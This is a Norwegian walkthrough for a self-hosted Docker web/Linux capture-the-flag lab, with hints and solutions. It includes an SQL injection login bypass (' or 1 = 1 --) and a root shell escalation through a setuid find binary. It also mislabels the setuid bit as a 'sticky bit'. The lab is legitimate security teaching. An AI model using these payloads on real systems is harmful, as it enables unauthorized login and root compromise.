# CTF

En Web/Linux CTF. Alle hint og svar er under, bruk som du ønsker :)

*Her var jeg ikke kjent med dine kunnskaper rundt Web eller Linux så derfor er flere hint og alle løsninger nedenfor.*

Ettersom dette kjører i Docker er det ikke mulighet for NMAP scan av host.

Her er informasjon du ville fått fra NMAP scan:
```
Port 2222/tcp   OpenSSH_8.9p1 Ubuntu-3ubuntu0.4, OpenSSL 3.0.2 15 Mar 2022
Port 8000/tcp   Apache/2.4.52 (Ubuntu)
Port 8001/tcp   Service
```

## Oppsett
Du må installere docker desktop om du er på windows/mac. Er du på linux installer docker.

Etter at docker (desktop) er installert og kjører, kjør følgende i terminal/powershell:
```
# docker login -u nichotheman 
Password: (Dette har du fått tilsendt)

# docker run --rm --name ctf -p 8000:80 -p 8001:8001 -p 2222:22 -d nichotheman/ctf
```

Verifiser at det kjører som det skal, ``STATUS`` skal si at den er ``Up``.

```
# docker ps -a
CONTAINER ID   IMAGE             COMMAND           CREATED         STATUS        
e5a2de916a00   nichotheman/ctf   "entrypoint.sh"   2 seconds ago   Up 1 second <-- Dette er bra
```

``127.0.0.1 maestro.ctf`` legges inn i Hosts fil om du ønsker. Hvis ikke blir hostname ``127.0.0.1``.

For windows, kjør powershell som administrator:
```ps
Add-Content -Path $env:windir\System32\drivers\etc\hosts -Value "`n127.0.0.1`tmaestro.ctf" -Force
```

<details>
  <summary>Steg 1: Les denne</summary>
  
  Hva kjører på host containeren?

  *Dette steget er allerede utført, men er et eksempel på hvordan spoiler til videre steg er. Du har nå ett valg om du vil utforske selv eller om du vil lese oppgaveteksen til steg 2.*
  
</details>
<br /><hr/><br/>
<details>
  <summary>Steg 2: Spoiler warning</summary>
  
  Hvor er den skjulte login siden?
  
</details>

<details>
  <summary>Steg 2: Hint 1</summary>
  
  Du når webserveren ved å bruke HTTP protokoll mot port 8000 i nettleseren din.

  [http://maestro.ctf:8000](http://maestro.ctf:8000) | [http://127.0.0.1:8000](http://127.0.0.1:8000)
  
</details>

<details>
  <summary>Steg 2: Hint 2</summary>
  
  Utforsk kildekoden til nettsiden.
  
</details>

<details>
  <summary>Steg 2: Hint 3</summary>
  
  robots.txt filen er en fil som forteller søkemotorer hvilke deler av nettsiden den får lov til å indeksere.

  [http://maestro.ctf:8000/robots.txt](http://maestro.ctf:8000/robots.txt) | [http://127.0.0.1:8000/robots.txt](http://127.0.0.1:8000/robots.txt)
  
</details>

<details>
  <summary>Steg 2: Løsning</summary>

  [http://maestro.ctf:8000/resistansen/](http://maestro.ctf:8000/resistansen/) | [http://127.0.0.1:8000/resistansen/](http://127.0.0.1:8000/resistansen)
  
</details>
<br /><hr/><br/>
<details>
  <summary>Steg 3: Spoiler warning</summary>
  
  Logg inn som brukeren violeta.
  
</details>

<details>
  <summary>Steg 3: Hint 1</summary>
  
  Innlogginskjema er ikke sikkert.
  
</details>

<details>
  <summary>Steg 3: Hint 2</summary>
  
  SQL Injection
  
</details>

<details>
  <summary>Steg 3: Løsning</summary>
  
  Brukernavn feltet kan lure logikken som ligger bak innlogginskjema til å returnere en rad ved spørring mot databasen.

  Brukes ``' or 1 = 1 --`` i ``username`` feltet endrer du spørringen til å returnere en rad om 1 = 1, og alt etter blir kommentert ut ved å legge til ``--``.

  Original spørring:
  ```sql
  SELECT * FROM users WHERE username = 'violeta' and password = 'wrong_password';
  ```

  SQL injection spørring:
  ```sql
  SELECT * FROM users WHERE username = '' or 1 = 1 --'and password = 'wrong_password';
  ```
  
</details>

<br /><hr/><br/>
<details>
  <summary>Steg 4: Spoiler warning</summary>
  
  Logg inn som brukeren ``insaneasylum`` over SSH.
  
</details>

<details>
  <summary>Steg 4: Hint 1</summary>
  
  Port for SSH finner du i NMAP scan.

  ```bash
  ssh insaneasylum@maestro.ctf -p 2222
  ```

</details>

<details>
  <summary>Steg 4: Hint 2</summary>
  
  Privat nøkkel

</details>

<details>
  <summary>Steg 4: Hint 3</summary>
  
  Etter du har logget inn på resistansen siden, marker all tekst på siden.

</details>

<details>
  <summary>Steg 4: Løsning</summary>
  
  Lagre den private nøkkelen fra resistansen siden og legg den inn i en maestro.key fil.
  
  Permissions på filen må endres til 600 på Linux/UNIX. 
  
  Er du på windows må du passe på at maestro.key filen ender med en ny linje og at kun du er eier av filen. Les mer her: https://superuser.com/questions/1296024/windows-ssh-permissions-for-private-key-are-too-open
  ```bash
  chmod 600 maestro.key
  ssh -i maestro.key insaneasylum@127.0.0.1 -p 2222
  ```
</details>

<br /><hr/><br/>
<details>
  <summary>Steg 5: Spoiler warning</summary>
  
  Eskaler til root
  
</details>

<details>
  <summary>Steg 5: Hint 1</summary>
  
  Se om du finner noe i bash historikken til insaneasylum brukeren.

</details>

<details>
  <summary>Steg 5: Hint 2</summary>
  
  Identifiser den sårbare binæren som er eid av root og har en sticky bit.

  Tips: [https://gtfobins.github.io](https://gtfobins.github.io) har ofte dokumentert hvordan du kan utnytte permissions.

</details>

<details>
  <summary>Steg 5: Løsning</summary>
  
  Den sårbare binæren er ``find``. 

  ```bash
  $ ls -la /usr/bin/find
  -rwsr-xr-x 1 root root 282088 Mar 23  2022 /usr/bin/find
     |
     --- Sticky bit
  ```

  Root shell kan oppnås ved å utnytte ``-exec`` opsjonen:
  ```
  $ find . -exec /bin/sh -p \; -quit
  # whoami
  root
  ```

</details>
<br /><hr/><br/>
<details>
  <summary>Steg 6: Spoiler warning</summary>
  
  Finn premien
  
</details>

<details>
  <summary>Steg 6: Hint 1</summary>
  
  Let i hjem mappen til root

</details>

<details>
  <summary>Steg 6: Hint 2</summary>
  
  Naviger inn i root mappa og les ``README`` filen.

</details>

<details>
  <summary>Steg 6: Løsning</summary>
  
  Eksekver linjen som ligger i README filen og naviger til python3 web serveren for å finne premien.

  [http://maestro.ctf:8001](http://maestro.ctf:8001) | [http://127.0.0.1:8001](http://127.0.0.1:8001)

</details>